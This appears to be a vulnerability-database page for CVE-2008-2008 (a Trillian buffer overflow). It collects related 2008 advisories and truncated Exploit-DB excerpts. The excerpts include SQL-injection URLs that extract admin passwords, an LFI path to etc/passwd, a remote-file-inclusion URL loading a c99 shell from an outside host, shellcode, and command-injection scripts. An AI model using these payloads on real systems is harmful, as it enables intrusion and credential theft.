CVE-2008-2008
published 2008-04-29CVE-2008-2008: Buffer overflow in the Display Names message feature in Cerulean Studios Trillian Basic and Pro 3.1.9.0 allows remote attackers to cause a denial of service…
PriorityP337critical9.3CVSS 2.0
AVNACMAuNCCICAC
EPSS
4.09%
89.5th percentile
Buffer overflow in the Display Names message feature in Cerulean Studios Trillian Basic and Pro 3.1.9.0 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long nickname in an MSN protocol message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cerulean_studios | trillian | — | — |
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat9.3CRITICAL
vendor_cisco9.0CRITICAL
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-24wh-gwj5-gmw5: Buffer overflow in the Display Names message feature in Cerulean Studios Trillian Basic and Pro 3
ghsa_unreviewed·2022-05-01
CVE-2008-2008 [HIGH] CWE-119 GHSA-24wh-gwj5-gmw5: Buffer overflow in the Display Names message feature in Cerulean Studios Trillian Basic and Pro 3
Buffer overflow in the Display Names message feature in Cerulean Studios Trillian Basic and Pro 3.1.9.0 allows remote attackers to cause a denial of service (crash) or execute arbitrary code via a long nickname in an MSN protocol message.
Red Hat
Firefox errors parsing URLs with control characters
vendor_redhat·2008-12-16·CVSS 4.3
CVE-2008-5508 [MEDIUM] Firefox errors parsing URLs with control characters
Firefox errors parsing URLs with control characters
Mozilla Firefox 3.x before 3.0.5 and 2.x before 2.0.0.19, Thunderbird 2.x before 2.0.0.19, and SeaMonkey 1.x before 1.1.14 does not properly parse URLs with leading whitespace or control characters, which might allow remote attackers to misrepresent URLs and simplify phishing attacks.
Red Hat
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
vendor_redhat·2008-10-27·CVSS 6.8
CVE-2008-4775 [MEDIUM] CWE-79 phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
phpMyAdmin: XSS issue in pmd_pdf.php via db parameter with register_globals enabled
Cross-site scripting (XSS) vulnerability in pmd_pdf.php in phpMyAdmin 3.0.0, and possibly other versions including 2.11.9.2 and 3.0.1, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the db parameter, a different vector than CVE-2006-6942 and CVE-2007-5977.
Red Hat
postfix improper mailbox permissions
vendor_redhat·2008-08-14·CVSS 1.9
CVE-2008-2937 [LOW] postfix improper mailbox permissions
postfix improper mailbox permissions
Postfix 2.5 before 2.5.4 and 2.6 before 2.6-20080814 delivers to a mailbox file even when this file is not owned by the recipient, which allows local users to read e-mail messages by creating a mailbox file corresponding to another user's account name.
Package: postfix (Red Hat Enterprise Linux 6) - Not affected
Red Hat
kernel: linux x86_64 ia32 emulation leaks uninitialized data
vendor_redhat·2008-06-25·CVSS 4.9
CVE-2008-0598 [MEDIUM] kernel: linux x86_64 ia32 emulation leaks uninitialized data
kernel: linux x86_64 ia32 emulation leaks uninitialized data
Unspecified vulnerability in the 32-bit and 64-bit emulation in the Linux kernel 2.6.9, 2.6.18, and probably other versions allows local users to read uninitialized memory via unknown vectors involving a crafted binary.
Cisco
Cisco Voice Portal Privilege Escalation Vulnerability
vendor_cisco·2008-05-21·CVSS 9.0
CVE-2008-2053 [CRITICAL] CWE-264 Cisco Voice Portal Privilege Escalation Vulnerability
Cisco Voice Portal Privilege Escalation Vulnerability
A vulnerability exists in the Cisco Unified Customer Voice Portal (CVP)
where an authenticated user can create, modify, or delete a superuser account.
Cisco has released software updates that address this vulnerability.
This advisory is posted at
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20080521-cvp.
Red Hat
eclipse: Help Content web application vulnerable to multiple XSS flaws
vendor_redhat·2008-04-24·CVSS 4.3
CVE-2008-7271 [MEDIUM] CWE-79 eclipse: Help Content web application vulnerable to multiple XSS flaws
eclipse: Help Content web application vulnerable to multiple XSS flaws
Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.
Package: eclipse (Red Hat Enterprise Linux 5) - Will not fix
Package: eclipse (Red Hat Enterprise Linux 6) - Not affected
Red Hat
Mozilla javascript engine crashes
vendor_redhat·2008-02-07·CVSS 9.3
CVE-2008-0413 [CRITICAL] Mozilla javascript engine crashes
Mozilla javascript engine crashes
The JavaScript engine in Mozilla Firefox before 2.0.0.12, Thunderbird before 2.0.0.12, and SeaMonkey before 1.1.8 allows remote attackers to cause a denial of service (crash) and possibly trigger memory corruption via (1) a large switch statement, (2) certain uses of watch and eval, (3) certain uses of the mousedown event listener, and other vectors.
Red Hat
mod_proxy_ftp XSS
vendor_redhat·2008-01-02·CVSS 4.3
CVE-2008-0005 [MEDIUM] CWE-79 mod_proxy_ftp XSS
mod_proxy_ftp XSS
mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
Cisco
Cisco Unified Communications Disaster Recovery Framework Command Execution Vulnerability
vendor_cisco
CVE-2008-1154 Cisco Unified Communications Disaster Recovery Framework Command Execution Vulnerability
CVE-2008-1154: Cisco Unified Communications Disaster Recovery Framework Command Execution Vulnerability
Several products in the Cisco Unified Communications family of products contain a command execution vulnerability in the Disaster Recovery Framework (DRF) feature. A remote, unauthenticated user could exploit this vulnerability to execute arbitrary commands that may allow full administrative access to affected systems. There is a workaround for this vulnerability. Cisco has released software updates that address this vulnerability. This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20080403-drf .
CWE: CWE-94, CWE-94
Bug IDs: CSCso53771, CSCso53771, CSCso53771
No detection rules found.
Exploit-DB
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
exploitdb·2009-03-23
CVE-2009-1236 Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overflow (PoC)
---
/* xnu-appletalk-zip.c
*
* Copyright (c) 2008 by
*
* Apple MACOS X xnu
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
int
main (int argc, char **argv)
{
struct sockaddr_at daddr, saddr;
char *p, buf[1024];
int fd, zlen;
printf ("Apple MACOS X xnu \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
if (argc [src addr]\n", argv[0]);
exit (EXIT_FAILURE);
}
if (!atalk_aton (argv[1], &daddr.sat_addr))
{
fprintf (stderr, "* dst address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
if (argc > 3)
{
if (!atalk_aton (argv[3], &saddr.sat_addr))
{
fprintf (stderr, "* src address: atalk_aton failed\n");
exit (EXIT_FAILURE);
}
}
daddr.sat_family = AF_APPLET
Exploit-DB
Joomla! Component PAX Gallery 0.1 - Blind SQL Injection
exploitdb·2008-12-28
CVE-2008-5811 Joomla! Component PAX Gallery 0.1 - Blind SQL Injection
Joomla! Component PAX Gallery 0.1 - Blind SQL Injection
---
[â– ] Joomla Component PAX Gallery v 0.1 (gid) --------------------------------------- AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------Version:
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5 [Ye$]
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
d8e
Exploit-DB
YourFreeWorld Reminder Service - SQL Injection
exploitdb·2008-11-01
CVE-2008-4881 YourFreeWorld Reminder Service - SQL Injection
YourFreeWorld Reminder Service - SQL Injection
---
Reminder Service ( id ) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.yourfreeworld.com/script/reminder.php
DorK : inurl:tr.php?id= Reminder Service
Exploit :
tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Demo :
http://www.downlinegoldmine.com/reminderservice/tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
Greetz : All my freind
# milw0rm.com [2008-11-01]
Exploit-DB
Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo
exploitdb·2008-10-20
CVE-2008-5323 Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo
Wysi Wiki Wyg 1.0 - Local File Inclusion / Cross-Site Scripting / PHPInfo
---
/*
Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
By StAkeR[at]hotmail[dot]it
http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
1- PHPInfo Disclosure
- index.php?categup=isset
2- Local File Inclusion (LFI) (MQ Off)
- index.php?c=../../../&a=etc/passwd%00
3- Cross Site Scripting (XSS)
- index.php?c=wikiwizi&a=recherche&s=[Javascript]
*/
# milw0rm.com [2008-10-20]
Exploit-DB
Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user
exploitdb·2008-09-11
CVE-2008-4167 Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user
Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user
---
#----------------------------------------------------------------
#
#Script : Ezphotogallery 2.1
#
#Type : Vulnerabilities ( Add Admin user/Remove user)
#
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#
#----------------------------------------------------------------
#
#Discovered by : Stack
#
#----------------------------------------------------------------
#
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#----------------------------------------------------------------
Exploit :
http://site.il/useradmin.php
how to use exploit
in Add user select
Simple example by Stack user :d :d
Add user
Name: Stack
Password: passstack
E-mail: Stack@h
Exploit-DB
Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow
exploitdb·2008-09-06
CVE-2008-4470 Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow
Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow
---
/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow
This sploit Launches calc.exe .. classical buffer overflow ,a 500 byte buffer is causing the exeption.
Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2.
After preparation:
|Access violation when executing [58414158]|
EAX 00000001
ECX 004C01B2 cue_tria.004C01B2
EDX 01030608
EBX 0309948D ASCII "I:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]\13.
Exploit-DB
Web Directory Script 1.5.3 - 'site' SQL Injection
exploitdb·2008-08-31
CVE-2008-4091 Web Directory Script 1.5.3 - 'site' SQL Injection
Web Directory Script 1.5.3 - 'site' SQL Injection
---
|___________________________________________________|
|
| Web directory script v1.5.3 (site) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://sourceworkshop.com/advanced_scripts/web_directory_script.html
|
| DorK : "Powered by web directory script"
|___________________________________________________|
Exploit:
www.[target].com/Script/index.php?command=open&site=-7+union+select+concat_ws(user(),version(),database())--
L!VE DEMO:
http://links.sourcew
Exploit-DB
IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)
exploitdb·2008-07-21
CVE-2008-5755 IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)
IntelliTamper 2.07 - '.map' Local Arbitrary Code Execution (2)
---
#!/usr/bin/perl
# k`sOSe - 7/21/2008
# http://secunia.com/advisories/20172
# A sploit for an ancient vuln. Just because i need
# to improve my skills on windows explotation.
use warnings;
use strict;
# CMD="c:\windows\system32\calc.exe"
# [*] x86/alpha_mixed succeeded, final size 345
# bad char -> \x89
my $shellcode =
"\x54\x5a\xda\xd0\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" .
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" .
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b" .
"\x4c\x4a\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55" .
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x42\
Exploit-DB
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)
exploitdb·2008-07-07
CVE-2008-3152 SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)
SmartPPC Pay Per Click Script - 'idDirectory' Blind SQL Injection (1)
---
+---------------------------------------+
| Blind SQL Injection Vulnerability |
| in Pay Per Click Script |
| found by Hamtaro aka CorVu5 |
|there must be 50 ways to learn to hover|
+---------------------------------------+
#gdork: "Pay Per Click Script powered by SmartPPC.com."
#vuln: site.com/directory.php?username=&idDirectory=90992%20and%20ascii(substring((SELECT%20concat(username,0x3a,pass)%20from%20users%20limit%200,1),1,1))%3E108
#login: site.com/accounts.php
greetz Hamtaro aka CorVu5
# milw0rm.com [2008-07-07]
Exploit-DB
Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection
exploitdb·2008-06-21
CVE-2008-2890 Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection
Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection
---
-[*]+================================================================================+[*]-
-[*]+ OFFL <= 0.2.6 Remote SQL Injection Vulnerability +[*]-
-[*]+================================================================================+[*]-
[*] Discovered By: t0pP8uZz
[*] Discovered On: 19 JUNE 2008
[*] Script Download: http://downloads.sourceforge.net/offl
[*] DORK: N/A
[*] Vendor Has Not Been Notified!
[*] DESCRIPTION:
OFFL 0.2.6 and prior versions, suffer from multiple insecure mysql querys.
SQL Injections below, there are various other spots which are injectable too...
including " leagues.php?league_id=1' ", " players.php?player_id=190' "
[*] SQL Injection:
For Admin: http://site.com/teams.php?f
Exploit-DB
3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal
exploitdb·2008-06-16
CVE-2008-2822 3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal
3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal
---
source: https://www.securityfocus.com/bid/29749/info
3D-FTP is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input data.
Exploiting these issues allows an attacker to write arbitrary files to locations outside of the FTP client's current directory. This could help the attacker launch further attacks.
3D-FTP 8.01 is vulnerable; other versions may also be affected.
The following example responses are available:
Response to LIST (backslash):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 \..\..\..\..\..\..\..\..\..\testfile.txt\r\n
Response to LIST (forward-slash):
-rw-r--r-- 1 ftp ftp 20 Mar 01 05:37 /../../../../../../../../../testfile.txt\r\n
Response to LIST (combination):
-
Exploit-DB
XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)
exploitdb·2008-06-13
CVE-2008-2841 XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)
XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)
---
##################################################################################################################
#
# Xchat
Welcome to my personal website
document.location='ircs://[email protected]" --command "shell calc"'
# milw0rm.com [2008-06-13]
Exploit-DB
Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)
exploitdb·2008-06-01
CVE-2008-4193 Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)
Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)
---
##################################################################################################################
# SecurityGateway 1.0.1 Remote Buffer Overflow ( username)
# Vendor: http://www.altn.com/
# risk : critical
#SecurityGateway open port 4000 for remote administration/managment, EIP get owned when the username field is filled with 720 chars
#
#eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000
#eip=63636363 esp=042ce910 ebp=042ce930 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#63636363 ?? ???
#
# Replace http://127.0.0.1:4000/ with your remote host.
use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 236;
my
Exploit-DB
philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection
exploitdb·2008-05-14
CVE-2008-2334 philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection
philboard 0.5 - 'W1L3D4_konuoku.asp?id' SQL Injection
---
source: https://www.securityfocus.com/bid/29229/info
Philboard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Philboard 0.5 is vulnerable; other versions may also be affected.
http://www.example.com:2222/lab/philboard_v5/W1L3D4_konuoku.asp?id=1+union+select+0,1,2,3,4,5,6,1,1,1,1,1,1,1,7,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,8,9,1,1,1,1,1,1,1,1,1,1+from+users
Exploit-DB
Pligg CMS 9.9.0 - 'editlink.php' SQL Injection
exploitdb·2008-04-08
CVE-2008-1774 Pligg CMS 9.9.0 - 'editlink.php' SQL Injection
Pligg CMS 9.9.0 - 'editlink.php' SQL Injection
---
Hello,
the Pligg (http://www.pligg.com/) content management system is prone to
an SQL-injection vulnerability because it fails to sufficiently sanitize
user-supplied data before using it in an SQL query:
editlink.php?id=1+AND+((SELECT+user_pass+FROM+pligg_users+WHERE+user_login=0x676f64)+LIKE+0x25)+UNION+SELECT+10,2
To exploit this you need the id of a news you submitted(10 in the
example) and an id of a news submitted by others(1 in the example).
When the LIKE statement matches you get a "Not your link" error.
Guido Landi
# milw0rm.com [2008-04-08]
Exploit-DB
PHPAddressBook 2.0 - 'index.php' SQL Injection
exploitdb·2008-03-26
CVE-2008-7145 PHPAddressBook 2.0 - 'index.php' SQL Injection
PHPAddressBook 2.0 - 'index.php' SQL Injection
---
source: https://www.securityfocus.com/bid/28456/info
phpAddressBook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpAddressBook 2.0 is vulnerable; other versions may also be affected.
The following proof of concept is available:
login:admin ' or 1=1/*
password:[blank]
Exploit-DB
Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow
exploitdb·2008-02-19
CVE-2008-0647 Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow
Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow
---
# milw0rm.com [2008-02-19]
Exploit-DB
WordPress Plugin WP-Footnotes 2.2 - Multiple Remote Vulnerabilities
exploitdb·2008-02-02
CVE-2008-0691 WordPress Plugin WP-Footnotes 2.2 - Multiple Remote Vulnerabilities
WordPress Plugin WP-Footnotes 2.2 - Multiple Remote Vulnerabilities
---
source: https://www.securityfocus.com/bid/27572/info
WP-Footnotes plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. The plugin also insecurely exposes administrative functionality.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects WP-Footnotes 2.2; other versions may also be vulnerable.
http://www.example.com/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priorit
Exploit-DB
Small Axe 0.3.1 - 'cfile' Remote File Inclusion
exploitdb·2008-01-18
CVE-2008-0442 Small Axe 0.3.1 - 'cfile' Remote File Inclusion
Small Axe 0.3.1 - 'cfile' Remote File Inclusion
---
# Name : Small Axe Weblog 0.3.1 Remote File Include
# Download From : http://releases.smallaxesolutions.com/smallaxe-0.3.1.zip
# Found By : RoMaNcYxHaCkEr We Are H-T TeaM (Houssamix - ToXiC)
# Home Page : Not Yet :( Tryag.cc/cc No-Hack.net V99x.com/vb Hackteach.org/cc
# Vulne Code In File linkbar.php In Line 1 :
include_once($cfile);
# Exploit :
http://Www.RxH.CoM/smallaxe-0.3.1/inc/linkbar.php?cfile=http://no-hack.net/shells/c99.txt?
That,s It,s
Good Luck Everybody
# Greet To :
"Cold Z3ro My Master , !!Hack-back!!" (Hackteach.org)
Tryag TeaM :"Mahmood_ali , cRMINEL_NET , Mohajer22 , Dr-Ha!l , LoVeRs Hacker , Abdullah00 , Athabi Ker , Mr-Wolf ...etc" (Tryag.com)
Hack15 TeaM :"GeNiUs-HaCkEr , Mr-AljoOOker , Mr-Shares , So9or
Exploit-DB
MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution
exploitdb·2008-01-16
CVE-2008-0382 MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution
MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution
---
#!/usr/bin/php -q -d short_open_tag=on
'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";
$packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("*",$html);
$temp2=explode("*",$temp[1]);
print "-------------------------------------------------------------------------\r\n";
print " MyBB
# milw0rm.com [2008-01-16]
Exploit-DB
SAP MaxDB 7.6.03.07 - Remote Command Execution
exploitdb·2008-01-09
CVE-2008-0244 SAP MaxDB 7.6.03.07 - Remote Command Execution
SAP MaxDB 7.6.03.07 - Remote Command Execution
---
#######################################################################
Luigi Auriemma
Application: SAP MaxDB
https://www.sdn.sap.com/irj/sdn/maxdb
http://www.sap.com
Versions: <= 7.6.03 build 007
Platforms: Windows, Linux and Solaris
Bug: pre-auth remote commands execution
Exploitation: remote
Date: 09 Jan 2008
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
1) Introduction
SAP MaxDB is a commercial and widely known and used database.
#######################################################################
2) Bug
The Ma
Bugzilla
CVE-2008-5824 audiofile: heap-based overflow in Microsoft ADPCM compression module (app crash, arb. code execution) [Fdevel]
bugzilla·2009-01-30·CVSS 6.8
CVE-2008-5824 [MEDIUM] CVE-2008-5824 audiofile: heap-based overflow in Microsoft ADPCM compression module (app crash, arb. code execution) [Fdevel]
CVE-2008-5824 audiofile: heap-based overflow in Microsoft ADPCM compression module (app crash, arb. code execution) [Fdevel]
Fdevel tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
This bug appears to have been reported against 'rawhide' during the Fedora 11 development cycle.
Changing version to '11'.
More information and reason for this action is here:
http://fedoraproject.org/wiki/BugZappers/HouseKeeping
---
This message is a reminder that Fedora 11 is nearing its end of life.
Approximately 30 (thirty) days from now Fedora will stop maintaining
and issuing updates for Fedora 11. It is Fedora's policy to close all
bug reports from releases that are no longer maintained. At that time
this bug
Bugzilla
CVE-2008-5077 OpenSSL Incorrect checks for malformed signatures
bugzilla·2008-12-16·CVSS 5.8
CVE-2008-5077 [MEDIUM] CVE-2008-5077 OpenSSL Incorrect checks for malformed signatures
CVE-2008-5077 OpenSSL Incorrect checks for malformed signatures
Draft advisory from OpenSSL team:
OpenSSL Security Advisory [07-Jan-2009]
Incorrect checks for malformed signatures
Several functions inside OpenSSL incorrectly checked the result after
calling the EVP_VerifyFinal function, allowing a malformed signature
to be treated as a good signature rather than as an error. This issue
affected the signature checks on DSA and ECDSA keys used with
SSL/TLS.
One way to exploit this flaw would be for a remote attacker who is in
control of a malicious server or who can use a 'man in the middle'
attack to present a malformed SSL/TLS signature from a certificate chain
to a vulnerable client, bypassing validation.
This vulnerability is tracked as CVE-2008-5077.
The OpenSSL security team wou
Bugzilla
CVE-2008-4456 mysql: mysql command line client XSS flaw
bugzilla·2008-10-10·CVSS 2.6
CVE-2008-4456 [LOW] CVE-2008-4456 mysql: mysql command line client XSS flaw
CVE-2008-4456 mysql: mysql command line client XSS flaw
Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document.
http://www.securityfocus.com/archive/1/archive/1/496842/100/0/threaded
http://www.securityfocus.com/archive/1/archive/1/496877/100/0/threaded
http://www.henlich.de/it-security/mysql-command-line-client-html-injection-vulnerability
http://bugs.mysql.com/bug.php?id=27884
http://secunia.com/advisories/32072
Discussion:
The issue has been rated as having low security impact, as this can only be a security flaw when all following conditions are
Bugzilla
CVE-2008-3964 libpng: off-by-one error in png_push_read_zTXt()
bugzilla·2008-09-09·CVSS 4.3
CVE-2008-3964 [MEDIUM] CVE-2008-3964 libpng: off-by-one error in png_push_read_zTXt()
CVE-2008-3964 libpng: off-by-one error in png_push_read_zTXt()
libpng upstream version 1.2.32beta01 fixes an insufficient memory allocation flaw in the "png_push_read_zTXt()" function in pngpread.c, that results in a write of once null byte past the end of allocated buffer.
References:
http://sourceforge.net/project/shownotes.php?release_id=624518
http://www.openwall.com/lists/oss-security/2008/09/09/3
Upstream bug report:
http://sourceforge.net/tracker/index.php?func=detail&aid=2095669&group_id=5624&atid=105624
As noted in the upstream bug report, this issue was introduced upstream in libpng-1.2.30beta04 and currently only affect 1.2.31 as available in Fedora Rawhide. Versions of libpng as shipped in Red Hat Enterprise Linux 2.1, 3, 4 and 5 are not affected by this flaw.
Discussion:
Bugzilla
CVE-2008-3699 amarok: temporary file vulnerability via symlink attacks (priv esc)
bugzilla·2008-08-14·CVSS 3.3
CVE-2008-3699 [LOW] CVE-2008-3699 amarok: temporary file vulnerability via symlink attacks (priv esc)
CVE-2008-3699 amarok: temporary file vulnerability via symlink attacks (priv esc)
Description of problem:
The "MagnatuneBrowser::listDownloadComplete()" function in Amarok 1.4.9.1
and prior versions handles temporary files in an insecure manner. This flaw
can be used by a malicious unprivileged user via symlink attack in combination
with a race condition to overwrite arbitrary files with the privileges of the user running the application (potential privilege escalation).
Version-Release number of selected component (if applicable):
1.4.9.1 and prior versions.
How reproducible:
No reproducer
Proposed patch:
http://websvn.kde.org/?view=rev&revision=846626
Public mentions of this issue:
http://secunia.com/advisories/31418/
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=494765
http:
Bugzilla
CVE-2008-3381 moin: XSS issue in the advanced search form
bugzilla·2008-07-31·CVSS 4.3
CVE-2008-3381 [MEDIUM] CVE-2008-3381 moin: XSS issue in the advanced search form
CVE-2008-3381 moin: XSS issue in the advanced search form
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-3381 to the
following vulnerability:
Multiple cross-site scripting (XSS) vulnerabilities in
macro/AdvancedSearch.py in moin (and MoinMoin) 1.6.3 and 1.7.0 allow
remote attackers to inject arbitrary web script or HTML via
unspecified vectors.
Upstream patches (1.6 and 1.7 branches):
http://hg.moinmo.in/moin/1.6/rev/8686a10f1f58
http://hg.moinmo.in/moin/1.7/rev/383196922b03
References:
http://moinmo.in/SecurityFixes#moin1.6.3
http://secunia.com/advisories/31135
Discussion:
There's no MoinMoin/macro/AdvancedSearch.py in moin 1.5.9 in F-8, so it's
probably unaffected.
---
moin-1.6.4-1.fc10 has been submitted as an update for Fedora 10.
http://admin.fedoraprojec
Bugzilla
CVE-2008-1928 perl-Imager: buffer overflow when using an image based fill on a double precision image
bugzilla·2008-04-24·CVSS 5.0
CVE-2008-1928 [MEDIUM] CVE-2008-1928 perl-Imager: buffer overflow when using an image based fill on a double precision image
CVE-2008-1928 perl-Imager: buffer overflow when using an image based fill on a double precision image
